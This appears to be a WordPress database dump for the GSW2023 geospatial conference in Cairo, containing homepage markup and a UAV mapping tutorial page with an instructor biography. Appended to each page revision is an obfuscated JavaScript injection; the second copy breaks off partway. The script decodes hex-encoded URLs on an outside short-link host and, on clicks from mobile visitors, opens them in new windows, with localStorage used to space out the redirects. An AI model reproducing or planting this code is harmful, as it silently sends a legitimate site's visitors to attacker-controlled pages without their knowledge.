custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-05 10:15:32','2023-02-05 10:15:32','',3066,'https://gsw2023.com/?p=3800',0,'revision','',0),
(3801,1,'2023-02-05 10:44:23','2023-02-05 10:44:23','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Ayman F. Habib</h6>\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"71\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\">UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications</h5>\n<p>&nbsp;</p>\n<h6><span style=\"font-size: 14pt;\"><strong>Tutorial Scope</strong></span></h6>\n<p style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:heading {\"level\":1} --></p>\n<h5><span style=\"font-size: 18pt;\"><strong>Instractor BIO</strong></span></h5>\n<h5 style=\"text-align: justify;\"><span style=\"font-size: 18pt;\"><strong><!-- /wp:heading --> <!-- wp:paragraph --></strong></span></h5>\n<p style=\"text-align: justify;\"><span style=\"text-align: justify; font-size: 12pt;\">Dr. Habib is the Thomas A. Page professor of Civil Engineering at Purdue University and the Co-Director of the Civil Engineering Center for Applications of UAS for a Sustainable Environment (CE-CAUSE). He is also the Associate Director of Purdue University’s Joint Transportation Research Program (JTRP). Dr. Habib’s research interests span the fields of terrestrial and aerial mobile mapping systems. He has been focusing on modeling the perspective geometry of non-traditional imaging scanners, automatic matching and change detection, automatic calibration of low-cost digital cameras, object recognition in imagery and point cloud data, LiDAR mapping, and integrating photogrammetric data with other sensors/datasets (e.g., GNSS/INS, GIS databases, multi- and hyper-spectral sensors, and LiDAR). Over the last seven years, he has been involved in the development, integration, and utilization of wheel-based and UAV-based mobile mapping systems for a wide range of applications in precision agriculture, geometric documentation of transportation corridors, digital forestry, crash scene reconstruction, cultural heritage documentation, environmental management, and infrastructure monitoring.</span></p>\n<p><!-- /wp:paragraph -->[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 